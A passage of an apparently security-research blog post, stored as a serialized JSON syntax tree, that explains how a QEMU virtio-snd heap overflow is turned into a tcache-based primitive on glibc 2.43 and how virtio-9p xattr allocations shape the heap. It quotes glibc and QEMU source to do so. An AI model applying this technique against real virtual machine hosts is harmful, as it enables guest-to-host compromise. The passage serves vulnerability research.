}\n",[126814],{"type":28,"tag":98,"props":126815,"children":126816},{"__ignoreMap":7},[126817,126825,126852,126859,126866,126873,126892,126899,126919,126926,126954,126978,126985,126998,127040,127047,127055,127062,127079],{"type":28,"tag":116,"props":126818,"children":126819},{"class":245,"line":246},[126820],{"type":28,"tag":116,"props":126821,"children":126822},{"style":376},[126823],{"type":33,"value":126824},"void\n",{"type":28,"tag":116,"props":126826,"children":126827},{"class":245,"line":256},[126828,126832,126836,126840,126844,126848],{"type":28,"tag":116,"props":126829,"children":126830},{"style":282},[126831],{"type":33,"value":126090},{"type":28,"tag":116,"props":126833,"children":126834},{"style":266},[126835],{"type":33,"value":269},{"type":28,"tag":116,"props":126837,"children":126838},{"style":376},[126839],{"type":33,"value":51245},{"type":28,"tag":116,"props":126841,"children":126842},{"style":370},[126843],{"type":33,"value":9484},{"type":28,"tag":116,"props":126845,"children":126846},{"style":272},[126847],{"type":33,"value":40284},{"type":28,"tag":116,"props":126849,"children":126850},{"style":266},[126851],{"type":33,"value":2830},{"type":28,"tag":116,"props":126853,"children":126854},{"class":245,"line":293},[126855],{"type":28,"tag":116,"props":126856,"children":126857},{"style":266},[126858],{"type":33,"value":10547},{"type":28,"tag":116,"props":126860,"children":126861},{"class":245,"line":361},[126862],{"type":28,"tag":116,"props":126863,"children":126864},{"style":266},[126865],{"type":33,"value":126133},{"type":28,"tag":116,"props":126867,"children":126868},{"class":245,"line":387},[126869],{"type":28,"tag":116,"props":126870,"children":126871},{"emptyLinePlaceholder":19},[126872],{"type":33,"value":1044},{"type":28,"tag":116,"props":126874,"children":126875},{"class":245,"line":400},[126876,126880,126884,126888],{"type":28,"tag":116,"props":126877,"children":126878},{"style":266},[126879],{"type":33,"value":126148},{"type":28,"tag":116,"props":126881,"children":126882},{"style":370},[126883],{"type":33,"value":373},{"type":28,"tag":116,"props":126885,"children":126886},{"style":282},[126887],{"type":33,"value":126157},{"type":28,"tag":116,"props":126889,"children":126890},{"style":266},[126891],{"type":33,"value":126162},{"type":28,"tag":116,"props":126893,"children":126894},{"class":245,"line":614},[126895],{"type":28,"tag":116,"props":126896,"children":126897},{"emptyLinePlaceholder":19},[126898],{"type":33,"value":1044},{"type":28,"tag":116,"props":126900,"children":126901},{"class":245,"line":631},[126902,126907,126911,126915],{"type":28,"tag":116,"props":126903,"children":126904},{"style":266},[126905],{"type":33,"value":126906},"  INTERNAL_SIZE_T size ",{"type":28,"tag":116,"props":126908,"children":126909},{"style":370},[126910],{"type":33,"value":373},{"type":28,"tag":116,"props":126912,"children":126913},{"style":282},[126914],{"type":33,"value":126484},{"type":28,"tag":116,"props":126916,"children":126917},{"style":266},[126918],{"type":33,"value":126203},{"type":28,"tag":116,"props":126920,"children":126921},{"class":245,"line":665},[126922],{"type":28,"tag":116,"props":126923,"children":126924},{"emptyLinePlaceholder":19},[126925],{"type":33,"value":1044},{"type":28,"tag":116,"props":126927,"children":126928},{"class":245,"line":713},[126929,126933,126937,126941,126945,126949],{"type":28,"tag":116,"props":126930,"children":126931},{"style":260},[126932],{"type":33,"value":31045},{"type":28,"tag":116,"props":126934,"children":126935},{"style":266},[126936],{"type":33,"value":269},{"type":28,"tag":116,"props":126938,"children":126939},{"style":282},[126940],{"type":33,"value":126679},{"type":28,"tag":116,"props":126942,"children":126943},{"style":266},[126944],{"type":33,"value":269},{"type":28,"tag":116,"props":126946,"children":126947},{"style":282},[126948],{"type":33,"value":126613},{"type":28,"tag":116,"props":126950,"children":126951},{"style":266},[126952],{"type":33,"value":126953}," (p)))\n",{"type":28,"tag":116,"props":126955,"children":126956},{"class":245,"line":750},[126957,126961,126966,126970,126974],{"type":28,"tag":116,"props":126958,"children":126959},{"style":260},[126960],{"type":33,"value":393},{"type":28,"tag":116,"props":126962,"children":126963},{"style":282},[126964],{"type":33,"value":126965}," malloc_printerr_tail",{"type":28,"tag":116,"props":126967,"children":126968},{"style":266},[126969],{"type":33,"value":269},{"type":28,"tag":116,"props":126971,"children":126972},{"style":563},[126973],{"type":33,"value":126643},{"type":28,"tag":116,"props":126975,"children":126976},{"style":266},[126977],{"type":33,"value":895},{"type":28,"tag":116,"props":126979,"children":126980},{"class":245,"line":779},[126981],{"type":28,"tag":116,"props":126982,"children":126983},{"emptyLinePlaceholder":19},[126984],{"type":33,"value":1044},{"type":28,"tag":116,"props":126986,"children":126987},{"class":245,"line":796},[126988,126993],{"type":28,"tag":116,"props":126989,"children":126990},{"style":260},[126991],{"type":33,"value":126992},"#if",{"type":28,"tag":116,"props":126994,"children":126995},{"style":282},[126996],{"type":33,"value":126997}," USE_TCACHE\n",{"type":28,"tag":116,"props":126999,"children":127000},{"class":245,"line":847},[127001,127005,127009,127014,127018,127022,127027,127031,127036],{"type":28,"tag":116,"props":127002,"children":127003},{"style":260},[127004],{"type":33,"value":31045},{"type":28,"tag":116,"props":127006,"children":127007},{"style":266},[127008],{"type":33,"value":269},{"type":28,"tag":116,"props":127010,"children":127011},{"style":282},[127012],{"type":33,"value":127013},"__glibc_likely",{"type":28,"tag":116,"props":127015,"children":127016},{"style":266},[127017],{"type":33,"value":126684},{"type":28,"tag":116,"props":127019,"children":127020},{"style":370},[127021],{"type":33,"value":514},{"type":28,"tag":116,"props":127023,"children":127024},{"style":272},[127025],{"type":33,"value":127026}," mp_",{"type":28,"tag":116,"props":127028,"children":127029},{"style":266},[127030],{"type":33,"value":141},{"type":28,"tag":116,"props":127032,"children":127033},{"style":272},[127034],{"type":33,"value":127035},"tcache_max_bytes",{"type":28,"tag":116,"props":127037,"children":127038},{"style":266},[127039],{"type":33,"value":19376},{"type":28,"tag":116,"props":127041,"children":127042},{"class":245,"line":898},[127043],{"type":28,"tag":116,"props":127044,"children":127045},{"style":266},[127046],{"type":33,"value":28842},{"type":28,"tag":116,"props":127048,"children":127049},{"class":245,"line":907},[127050],{"type":28,"tag":116,"props":127051,"children":127052},{"style":266},[127053],{"type":33,"value":127054},"      [...]\n",{"type":28,"tag":116,"props":127056,"children":127057},{"class":245,"line":981},[127058],{"type":28,"tag":116,"props":127059,"children":127060},{"emptyLinePlaceholder":19},[127061],{"type":33,"value":1044},{"type":28,"tag":116,"props":127063,"children":127064},{"class":245,"line":1011},[127065,127069,127074],{"type":28,"tag":116,"props":127066,"children":127067},{"style":260},[127068],{"type":33,"value":38977},{"type":28,"tag":116,"props":127070,"children":127071},{"style":282},[127072],{"type":33,"value":127073}," tcache_put",{"type":28,"tag":116,"props":127075,"children":127076},{"style":266},[127077],{"type":33,"value":127078}," (p, tc_idx);\n",{"type":28,"tag":116,"props":127080,"children":127081},{"class":245,"line":1029},[127082],{"type":28,"tag":116,"props":127083,"children":127084},{"style":266},[127085],{"type":33,"value":3025},{"type":28,"tag":29,"props":127087,"children":127088},{},[127089,127091,127096],{"type":33,"value":127090},"It is easy to notice that, when taking the tcache path, there are essentially no integrity checks on the ",{"type":28,"tag":98,"props":127092,"children":127094},{"className":127093},[],[127095],{"type":33,"value":123873},{"type":33,"value":127097}," field beyond the basic size-range decision needed to determine whether the chunk fits into tcache. The only explicit check here is that the pointer itself is aligned, which is not something we care about.",{"type":28,"tag":29,"props":127099,"children":127100},{},[127101,127103,127109,127110,127115],{"type":33,"value":127102},"In fact, even the version prior to 2.43 still performed more validation on the tcache path by calling ",{"type":28,"tag":98,"props":127104,"children":127106},{"className":127105},[],[127107],{"type":33,"value":127108},"check_inuse_chunk",{"type":33,"value":269},{"type":28,"tag":98,"props":127111,"children":127113},{"className":127112},[],[127114],{"type":33,"value":124001},{"type":33,"value":23600},{"type":28,"tag":234,"props":127117,"children":127119},{"code":127118,"language":1797,"meta":7,"className":16176,"style":7},"void\n__libc_free (void *mem)\n{\n  mchunkptr p;\n\n  p = mem2chunk (mem);\n\n  INTERNAL_SIZE_T size = chunksize (p);\n\n  if (__glibc_unlikely (misaligned_chunk (p)))\n    return malloc_printerr_tail (\"free(): invalid pointer\");\n\n  check_inuse_chunk (arena_for_chunk (p), p);             // [1]\n\n#if USE_TCACHE\n  if (__glibc_likely (size \u003C mp_.tcache_max_bytes && tcache != NULL))\n  [...]\n",[127120],{"type":28,"tag":98,"props":127121,"children":127122},{"__ignoreMap":7},[127123,127130,127157,127164,127171,127178,127197,127204,127223,127230,127257,127280,127287,127313,127320,127331,127388],{"type":28,"tag":116,"props":127124,"children":127125},{"class":245,"line":246},[127126],{"type":28,"tag":116,"props":127127,"children":127128},{"style":376},[127129],{"type":33,"value":126824},{"type":28,"tag":116,"props":127131,"children":127132},{"class":245,"line":256},[127133,127137,127141,127145,127149,127153],{"type":28,"tag":116,"props":127134,"children":127135},{"style":282},[127136],{"type":33,"value":126090},{"type":28,"tag":116,"props":127138,"children":127139},{"style":266},[127140],{"type":33,"value":269},{"type":28,"tag":116,"props":127142,"children":127143},{"style":376},[127144],{"type":33,"value":51245},{"type":28,"tag":116,"props":127146,"children":127147},{"style":370},[127148],{"type":33,"value":9484},{"type":28,"tag":116,"props":127150,"children":127151},{"style":272},[127152],{"type":33,"value":40284},{"type":28,"tag":116,"props":127154,"children":127155},{"style":266},[127156],{"type":33,"value":2830},{"type":28,"tag":116,"props":127158,"children":127159},{"class":245,"line":293},[127160],{"type":28,"tag":116,"props":127161,"children":127162},{"style":266},[127163],{"type":33,"value":10547},{"type":28,"tag":116,"props":127165,"children":127166},{"class":245,"line":361},[127167],{"type":28,"tag":116,"props":127168,"children":127169},{"style":266},[127170],{"type":33,"value":126133},{"type":28,"tag":116,"props":127172,"children":127173},{"class":245,"line":387},[127174],{"type":28,"tag":116,"props":127175,"children":127176},{"emptyLinePlaceholder":19},[127177],{"type":33,"value":1044},{"type":28,"tag":116,"props":127179,"children":127180},{"class":245,"line":400},[127181,127185,127189,127193],{"type":28,"tag":116,"props":127182,"children":127183},{"style":266},[127184],{"type":33,"value":126148},{"type":28,"tag":116,"props":127186,"children":127187},{"style":370},[127188],{"type":33,"value":373},{"type":28,"tag":116,"props":127190,"children":127191},{"style":282},[127192],{"type":33,"value":126157},{"type":28,"tag":116,"props":127194,"children":127195},{"style":266},[127196],{"type":33,"value":126162},{"type":28,"tag":116,"props":127198,"children":127199},{"class":245,"line":614},[127200],{"type":28,"tag":116,"props":127201,"children":127202},{"emptyLinePlaceholder":19},[127203],{"type":33,"value":1044},{"type":28,"tag":116,"props":127205,"children":127206},{"class":245,"line":631},[127207,127211,127215,127219],{"type":28,"tag":116,"props":127208,"children":127209},{"style":266},[127210],{"type":33,"value":126906},{"type":28,"tag":116,"props":127212,"children":127213},{"style":370},[127214],{"type":33,"value":373},{"type":28,"tag":116,"props":127216,"children":127217},{"style":282},[127218],{"type":33,"value":126484},{"type":28,"tag":116,"props":127220,"children":127221},{"style":266},[127222],{"type":33,"value":126203},{"type":28,"tag":116,"props":127224,"children":127225},{"class":245,"line":665},[127226],{"type":28,"tag":116,"props":127227,"children":127228},{"emptyLinePlaceholder":19},[127229],{"type":33,"value":1044},{"type":28,"tag":116,"props":127231,"children":127232},{"class":245,"line":713},[127233,127237,127241,127245,127249,127253],{"type":28,"tag":116,"props":127234,"children":127235},{"style":260},[127236],{"type":33,"value":31045},{"type":28,"tag":116,"props":127238,"children":127239},{"style":266},[127240],{"type":33,"value":269},{"type":28,"tag":116,"props":127242,"children":127243},{"style":282},[127244],{"type":33,"value":126679},{"type":28,"tag":116,"props":127246,"children":127247},{"style":266},[127248],{"type":33,"value":269},{"type":28,"tag":116,"props":127250,"children":127251},{"style":282},[127252],{"type":33,"value":126613},{"type":28,"tag":116,"props":127254,"children":127255},{"style":266},[127256],{"type":33,"value":126953},{"type":28,"tag":116,"props":127258,"children":127259},{"class":245,"line":750},[127260,127264,127268,127272,127276],{"type":28,"tag":116,"props":127261,"children":127262},{"style":260},[127263],{"type":33,"value":393},{"type":28,"tag":116,"props":127265,"children":127266},{"style":282},[127267],{"type":33,"value":126965},{"type":28,"tag":116,"props":127269,"children":127270},{"style":266},[127271],{"type":33,"value":269},{"type":28,"tag":116,"props":127273,"children":127274},{"style":563},[127275],{"type":33,"value":126643},{"type":28,"tag":116,"props":127277,"children":127278},{"style":266},[127279],{"type":33,"value":895},{"type":28,"tag":116,"props":127281,"children":127282},{"class":245,"line":779},[127283],{"type":28,"tag":116,"props":127284,"children":127285},{"emptyLinePlaceholder":19},[127286],{"type":33,"value":1044},{"type":28,"tag":116,"props":127288,"children":127289},{"class":245,"line":796},[127290,127294,127298,127303,127308],{"type":28,"tag":116,"props":127291,"children":127292},{"style":282},[127293],{"type":33,"value":126746},{"type":28,"tag":116,"props":127295,"children":127296},{"style":266},[127297],{"type":33,"value":269},{"type":28,"tag":116,"props":127299,"children":127300},{"style":282},[127301],{"type":33,"value":127302},"arena_for_chunk",{"type":28,"tag":116,"props":127304,"children":127305},{"style":266},[127306],{"type":33,"value":127307}," (p), p);",{"type":28,"tag":116,"props":127309,"children":127310},{"style":250},[127311],{"type":33,"value":127312},"             // [1]\n",{"type":28,"tag":116,"props":127314,"children":127315},{"class":245,"line":847},[127316],{"type":28,"tag":116,"props":127317,"children":127318},{"emptyLinePlaceholder":19},[127319],{"type":33,"value":1044},{"type":28,"tag":116,"props":127321,"children":127322},{"class":245,"line":898},[127323,127327],{"type":28,"tag":116,"props":127324,"children":127325},{"style":260},[127326],{"type":33,"value":126992},{"type":28,"tag":116,"props":127328,"children":127329},{"style":282},[127330],{"type":33,"value":126997},{"type":28,"tag":116,"props":127332,"children":127333},{"class":245,"line":907},[127334,127338,127342,127346,127350,127354,127358,127362,127366,127370,127375,127379,127384],{"type":28,"tag":116,"props":127335,"children":127336},{"style":260},[127337],{"type":33,"value":31045},{"type":28,"tag":116,"props":127339,"children":127340},{"style":266},[127341],{"type":33,"value":269},{"type":28,"tag":116,"props":127343,"children":127344},{"style":282},[127345],{"type":33,"value":127013},{"type":28,"tag":116,"props":127347,"children":127348},{"style":266},[127349],{"type":33,"value":126684},{"type":28,"tag":116,"props":127351,"children":127352},{"style":370},[127353],{"type":33,"value":514},{"type":28,"tag":116,"props":127355,"children":127356},{"style":272},[127357],{"type":33,"value":127026},{"type":28,"tag":116,"props":127359,"children":127360},{"style":266},[127361],{"type":33,"value":141},{"type":28,"tag":116,"props":127363,"children":127364},{"style":272},[127365],{"type":33,"value":127035},{"type":28,"tag":116,"props":127367,"children":127368},{"style":370},[127369],{"type":33,"value":13851},{"type":28,"tag":116,"props":127371,"children":127372},{"style":266},[127373],{"type":33,"value":127374}," tcache ",{"type":28,"tag":116,"props":127376,"children":127377},{"style":370},[127378],{"type":33,"value":15350},{"type":28,"tag":116,"props":127380,"children":127381},{"style":376},[127382],{"type":33,"value":127383}," NULL",{"type":28,"tag":116,"props":127385,"children":127386},{"style":266},[127387],{"type":33,"value":19376},{"type":28,"tag":116,"props":127389,"children":127390},{"class":245,"line":981},[127391],{"type":28,"tag":116,"props":127392,"children":127393},{"style":266},[127394],{"type":33,"value":126766},{"type":28,"tag":29,"props":127396,"children":127397},{},[127398,127400,127405],{"type":33,"value":127399},"This means that as long as we can reliably force the corrupted chunk down the tcache path, we no longer need to worry much about integrity checks on ",{"type":28,"tag":98,"props":127401,"children":127403},{"className":127402},[],[127404],{"type":33,"value":123873},{"type":33,"value":127406},", because on the latest 2.43 glibc they are non-existent.",{"type":28,"tag":18457,"props":127408,"children":127409},{},[],{"type":28,"tag":29,"props":127411,"children":127412},{},[127413,127415,127420,127422,127428,127430,127435,127437,127443],{"type":33,"value":127414},"With that in mind, the idea we settled on was to allocate a chunk whose ",{"type":28,"tag":98,"props":127416,"children":127418},{"className":127417},[],[127419],{"type":33,"value":123873},{"type":33,"value":127421}," field was initially ",{"type":28,"tag":98,"props":127423,"children":127425},{"className":127424},[],[127426],{"type":33,"value":127427},"0x200",{"type":33,"value":127429},", then trigger the overflow and corrupt only its low byte. If the byte written is at least ",{"type":28,"tag":98,"props":127431,"children":127433},{"className":127432},[],[127434],{"type":33,"value":126050},{"type":33,"value":127436},", the resulting value would correspond to a larger, tcache-eligible, size in range ",{"type":28,"tag":98,"props":127438,"children":127440},{"className":127439},[],[127441],{"type":33,"value":127442},"[0x210, 0x2f0]",{"type":33,"value":127444},". That would let us free the chunk as an oversized entry into the tcache freelist, which we could later reclaim and overlap chunks for a better primitive.",{"type":28,"tag":29,"props":127446,"children":127447},{},[127448],{"type":33,"value":127449},"This approach gives us much better odds of success. In fact, with the stream configuration we use later, we can make this behavior reliable enough to exploit consistently.",{"type":28,"tag":75,"props":127451,"children":127453},{"id":127452},"heap-spraying",[127454],{"type":33,"value":127455},"Heap Spraying",{"type":28,"tag":29,"props":127457,"children":127458},{},[127459,127461,127466],{"type":33,"value":127460},"With that idea in mind, we now need a way to shape the heap so that a ",{"type":28,"tag":98,"props":127462,"children":127464},{"className":127463},[],[127465],{"type":33,"value":127427},{"type":33,"value":127467},"-sized chunk is placed immediately after the vulnerable virtio-snd buffer. In addition, we need to drain any existing entries from the relevant tcache freelist so that it is not full when we later free the corrupted oversized chunk.",{"type":28,"tag":29,"props":127469,"children":127470},{},[127471,127473,127478],{"type":33,"value":127472},"Unfortunately, while virtio-snd does provide some heap spraying primitives through its buffer allocations, they are fairly limited. For example, we could only allocate up to 64 buffers at a time. On top of that, ",{"type":28,"tag":98,"props":127474,"children":127476},{"className":127475},[],[127477],{"type":33,"value":124068},{"type":33,"value":127479}," is a FIFO queue, so we could not control the order in which those buffers were freed - they would always be released in the same order they were inserted.",{"type":28,"tag":29,"props":127481,"children":127482},{},[127483],{"type":33,"value":127484},"For the purposes of this blog post, we therefore enabled another virtio device to help with heap shaping.",{"type":28,"tag":443,"props":127486,"children":127488},{"id":127487},"virtio-9p",[127489],{"type":33,"value":127487},{"type":28,"tag":29,"props":127491,"children":127492},{},[127493,127498],{"type":28,"tag":98,"props":127494,"children":127496},{"className":127495},[],[127497],{"type":33,"value":127487},{"type":33,"value":127499}," is a paravirtualized filesystem device that lets the guest access a directory exported by the host through the 9P protocol. The part that interested us most was its handling of extended attributes, or xattrs.",{"type":28,"tag":29,"props":127501,"children":127502},{},[127503,127505,127511,127513,127519,127520,127526,127528,127533],{"type":33,"value":127504},"Through a ",{"type":28,"tag":98,"props":127506,"children":127508},{"className":127507},[],[127509],{"type":33,"value":127510},"P9_TXATTRCREATE",{"type":33,"value":127512}," request, we can allocate host-side buffers for both the ",{"type":28,"tag":98,"props":127514,"children":127516},{"className":127515},[],[127517],{"type":33,"value":127518},".name",{"type":33,"value":10659},{"type":28,"tag":98,"props":127521,"children":127523},{"className":127522},[],[127524],{"type":33,"value":127525},".value",{"type":33,"value":127527}," fields, with the size of ",{"type":28,"tag":98,"props":127529,"children":127531},{"className":127530},[],[127532],{"type":33,"value":127525},{"type":33,"value":127534}," being directly controlled by the guest.",{"type":28,"tag":234,"props":127536,"children":127538},{"code":127537,"language":1797,"meta":7,"className":16176,"style":7},"static void coroutine_fn v9fs_xattrcreate(void *opaque)\n{\n    int flags, rflags = 0;\n    int32_t fid;\n    uint64_t size;\n    ssize_t err = 0;\n    V9fsString name;\n    size_t offset = 7;\n    V9fsFidState *file_fidp;\n    V9fsFidState *xattr_fidp;\n    V9fsPDU *pdu = opaque;\n\n    v9fs_string_init(&name);\n    err = pdu_unmarshal(pdu, offset, \"dsqd\", &fid, &name, &size, &flags);\n    if (err \u003C 0) {\n        goto out_nofid;\n    }\n\n    [...]\n\n    if (size > P9_XATTR_SIZE_MAX) {\n        err = -E2BIG;\n        goto out_nofid;\n    }\n\n    [...]\n\n    v9fs_string_init(&xattr_fidp->fs.xattr.name);\n    v9fs_string_copy(&xattr_fidp->fs.xattr.name, &name);\n    xattr_fidp->fs.xattr.value = g_malloc0(size);\n}\n",[127539],{"type":28,"tag":98,"props":127540,"children":127541},{"__ignoreMap":7},[127542,127584,127591,127615,127628,127639,127664,127672,127697,127714,127730,127756,127763,127784,127850,127874,127887,127894,127901,127908,127915,127935,127956,127967,127974,127981,127988,127995,128044,128100,128145],{"type":28,"tag":116,"props":127543,"children":127544},{"class":245,"line":246},[127545,127549,127553,127558,127563,127567,127571,127575,127580],{"type":28,"tag":116,"props":127546,"children":127547},{"style":376},[127548],{"type":33,"value":50664},{"type":28,"tag":116,"props":127550,"children":127551},{"style":376},[127552],{"type":33,"value":2169},{"type":28,"tag":116,"props":127554,"children":127555},{"style":266},[127556],{"type":33,"value":127557}," coroutine_fn ",{"type":28,"tag":116,"props":127559,"children":127560},{"style":282},[127561],{"type":33,"value":127562},"v9fs_xattrcreate",{"type":28,"tag":116,"props":127564,"children":127565},{"style":266},[127566],{"type":33,"value":313},{"type":28,"tag":116,"props":127568,"children":127569},{"style":376},[127570],{"type":33,"value":51245},{"type":28,"tag":116,"props":127572,"children":127573},{"style":370},[127574],{"type":33,"value":9484},{"type":28,"tag":116,"props":127576,"children":127577},{"style":272},[127578],{"type":33,"value":127579},"opaque",{"type":28,"tag":116,"props":127581,"children":127582},{"style":266},[127583],{"type":33,"value":2830},{"type":28,"tag":116,"props":127585,"children":127586},{"class":245,"line":256},[127587],{"type":28,"tag":116,"props":127588,"children":127589},{"style":266},[127590],{"type":33,"value":10547},{"type":28,"tag":116,"props":127592,"children":127593},{"class":245,"line":293},[127594,127598,127603,127607,127611],{"type":28,"tag":116,"props":127595,"children":127596},{"style":376},[127597],{"type":33,"value":18740},{"type":28,"tag":116,"props":127599,"children":127600},{"style":266},[127601],{"type":33,"value":127602}," flags, rflags ",{"type":28,"tag":116,"props":127604,"children":127605},{"style":370},[127606],{"type":33,"value":373},{"type":28,"tag":116,"props":127608,"children":127609},{"style":350},[127610],{"type":33,"value":2718},{"type":28,"tag":116,"props":127612,"children":127613},{"style":266},[127614],{"type":33,"value":384},{"type":28,"tag":116,"props":127616,"children":127617},{"class":245,"line":361},[127618,127623],{"type":28,"tag":116,"props":127619,"children":127620},{"style":376},[127621],{"type":33,"value":127622},"    int32_t",{"type":28,"tag":116,"props":127624,"children":127625},{"style":266},[127626],{"type":33,"value":127627}," fid;\n",{"type":28,"tag":116,"props":127629,"children":127630},{"class":245,"line":387},[127631,127635],{"type":28,"tag":116,"props":127632,"children":127633},{"style":376},[127634],{"type":33,"value":55231},{"type":28,"tag":116,"props":127636,"children":127637},{"style":266},[127638],{"type":33,"value":124215},{"type":28,"tag":116,"props":127640,"children":127641},{"class":245,"line":400},[127642,127647,127652,127656,127660],{"type":28,"tag":116,"props":127643,"children":127644},{"style":376},[127645],{"type":33,"value":127646},"    ssize_t",{"type":28,"tag":116,"props":127648,"children":127649},{"style":266},[127650],{"type":33,"value":127651}," err ",{"type":28,"tag":116,"props":127653,"children":127654},{"style":370},[127655],{"type":33,"value":373},{"type":28,"tag":116,"props":127657,"children":127658},{"style":350},[127659],{"type":33,"value":2718},{"type":28,"tag":116,"props":127661,"children":127662},{"style":266},[127663],{"type":33,"value":384},{"type":28,"tag":116,"props":127665,"children":127666},{"class":245,"line":614},[127667],{"type":28,"tag":116,"props":127668,"children":127669},{"style":266},[127670],{"type":33,"value":127671},"    V9fsString name;\n",{"type":28,"tag":116,"props":127673,"children":127674},{"class":245,"line":631},[127675,127679,127684,127688,127693],{"type":28,"tag":116,"props":127676,"children":127677},{"style":376},[127678],{"type":33,"value":16226},{"type":28,"tag":116,"props":127680,"children":127681},{"style":266},[127682],{"type":33,"value":127683}," offset ",{"type":28,"tag":116,"props":127685,"children":127686},{"style":370},[127687],{"type":33,"value":373},{"type":28,"tag":116,"props":127689,"children":127690},{"style":350},[127691],{"type":33,"value":127692}," 7",{"type":28,"tag":116,"props":127694,"children":127695},{"style":266},[127696],{"type":33,"value":384},{"type":28,"tag":116,"props":127698,"children":127699},{"class":245,"line":665},[127700,127705,127709],{"type":28,"tag":116,"props":127701,"children":127702},{"style":266},[127703],{"type":33,"value":127704},"    V9fsFidState ",{"type":28,"tag":116,"props":127706,"children":127707},{"style":370},[127708],{"type":33,"value":4240},{"type":28,"tag":116,"props":127710,"children":127711},{"style":266},[127712],{"type":33,"value":127713},"file_fidp;\n",{"type":28,"tag":116,"props":127715,"children":127716},{"class":245,"line":713},[127717,127721,127725],{"type":28,"tag":116,"props":127718,"children":127719},{"style":266},[127720],{"type":33,"value":127704},{"type":28,"tag":116,"props":127722,"children":127723},{"style":370},[127724],{"type":33,"value":4240},{"type":28,"tag":116,"props":127726,"children":127727},{"style":266},[127728],{"type":33,"value":127729},"xattr_fidp;\n",{"type":28,"tag":116,"props":127731,"children":127732},{"class":245,"line":750},[127733,127738,127742,127747,127751],{"type":28,"tag":116,"props":127734,"children":127735},{"style":266},[127736],{"type":33,"value":127737},"    V9fsPDU ",{"type":28,"tag":116,"props":127739,"children":127740},{"style":370},[127741],{"type":33,"value":4240},{"type":28,"tag":116,"props":127743,"children":127744},{"style":266},[127745],{"type":33,"value":127746},"pdu ",{"type":28,"tag":116,"props":127748,"children":127749},{"style":370},[127750],{"type":33,"value":373},{"type":28,"tag":116,"props":127752,"children":127753},{"style":266},[127754],{"type":33,"value":127755}," opaque;\n",{"type":28,"tag":116,"props":127757,"children":127758},{"class":245,"line":779},[127759],{"type":28,"tag":116,"props":127760,"children":127761},{"emptyLinePlaceholder":19},[127762],{"type":33,"value":1044},{"type":28,"tag":116,"props":127764,"children":127765},{"class":245,"line":796},[127766,127771,127775,127779],{"type":28,"tag":116,"props":127767,"children":127768},{"style":282},[127769],{"type":33,"value":127770},"    v9fs_string_init",{"type":28,"tag":116,"props":127772,"children":127773},{"style":266},[127774],{"type":33,"value":313},{"type":28,"tag":116,"props":127776,"children":127777},{"style":370},[127778],{"type":33,"value":2780},{"type":28,"tag":116,"props":127780,"children":127781},{"style":266},[127782],{"type":33,"value":127783},"name);\n",{"type":28,"tag":116,"props":127785,"children":127786},{"class":245,"line":847},[127787,127792,127796,127801,127806,127811,127815,127819,127824,127828,127833,127837,127841,127845],{"type":28,"tag":116,"props":127788,"children":127789},{"style":266},[127790],{"type":33,"value":127791},"    err ",{"type":28,"tag":116,"props":127793,"children":127794},{"style":370},[127795],{"type":33,"value":373},{"type":28,"tag":116,"props":127797,"children":127798},{"style":282},[127799],{"type":33,"value":127800}," pdu_unmarshal",{"type":28,"tag":116,"props":127802,"children":127803},{"style":266},[127804],{"type":33,"value":127805},"(pdu, offset, ",{"type":28,"tag":116,"props":127807,"children":127808},{"style":563},[127809],{"type":33,"value":127810},"\"dsqd\"",{"type":28,"tag":116,"props":127812,"children":127813},{"style":266},[127814],{"type":33,"value":825},{"type":28,"tag":116,"props":127816,"children":127817},{"style":370},[127818],{"type":33,"value":2780},{"type":28,"tag":116,"props":127820,"children":127821},{"style":266},[127822],{"type":33,"value":127823},"fid, ",{"type":28,"tag":116,"props":127825,"children":127826},{"style":370},[127827],{"type":33,"value":2780},{"type":28,"tag":116,"props":127829,"children":127830},{"style":266},[127831],{"type":33,"value":127832},"name, ",{"type":28,"tag":116,"props":127834,"children":127835},{"style":370},[127836],{"type":33,"value":2780},{"type":28,"tag":116,"props":127838,"children":127839},{"style":266},[127840],{"type":33,"value":126583},{"type":28,"tag":116,"props":127842,"children":127843},{"style":370},[127844],{"type":33,"value":2780},{"type":28,"tag":116,"props":127846,"children":127847},{"style":266},[127848],{"type":33,"value":127849},"flags);\n",{"type":28,"tag":116,"props":127851,"children":127852},{"class":245,"line":898},[127853,127857,127862,127866,127870],{"type":28,"tag":116,"props":127854,"children":127855},{"style":260},[127856],{"type":33,"value":11947},{"type":28,"tag":116,"props":127858,"children":127859},{"style":266},[127860],{"type":33,"value":127861}," (err ",{"type":28,"tag":116,"props":127863,"children":127864},{"style":370},[127865],{"type":33,"value":514},{"type":28,"tag":116,"props":127867,"children":127868},{"style":350},[127869],{"type":33,"value":2718},{"type":28,"tag":116,"props":127871,"children":127872},{"style":266},[127873],{"type":33,"value":844},{"type":28,"tag":116,"props":127875,"children":127876},{"class":245,"line":907},[127877,127882],{"type":28,"tag":116,"props":127878,"children":127879},{"style":260},[127880],{"type":33,"value":127881},"        goto",{"type":28,"tag":116,"props":127883,"children":127884},{"style":266},[127885],{"type":33,"value":127886}," out_nofid;\n",{"type":28,"tag":116,"props":127888,"children":127889},{"class":245,"line":981},[127890],{"type":28,"tag":116,"props":127891,"children":127892},{"style":266},[127893],{"type":33,"value":3025},{"type":28,"tag":116,"props":127895,"children":127896},{"class":245,"line":1011},[127897],{"type":28,"tag":116,"props":127898,"children":127899},{"emptyLinePlaceholder":19},[127900],{"type":33,"value":1044},{"type":28,"tag":116,"props":127902,"children":127903},{"class":245,"line":1029},[127904],{"type":28,"tag":116,"props":127905,"children":127906},{"style":266},[127907],{"type":33,"value":104414},{"type":28,"tag":116,"props":127909,"children":127910},{"class":245,"line":1038},[127911],{"type":28,"tag":116,"props":127912,"children":127913},{"emptyLinePlaceholder":19},[127914],{"type":33,"value":1044},{"type":28,"tag":116,"props":127916,"children":127917},{"class":245,"line":1047},[127918,127922,127926,127930],{"type":28,"tag":116,"props":127919,"children":127920},{"style":260},[127921],{"type":33,"value":11947},{"type":28,"tag":116,"props":127923,"children":127924},{"style":266},[127925],{"type":33,"value":126684},{"type":28,"tag":116,"props":127927,"children":127928},{"style":370},[127929],{"type":33,"value":645},{"type":28,"tag":116,"props":127931,"children":127932},{"style":266},[127933],{"type":33,"value":127934}," P9_XATTR_SIZE_MAX) {\n",{"type":28,"tag":116,"props":127936,"children":127937},{"class":245,"line":1071},[127938,127943,127947,127951],{"type":28,"tag":116,"props":127939,"children":127940},{"style":266},[127941],{"type":33,"value":127942},"        err 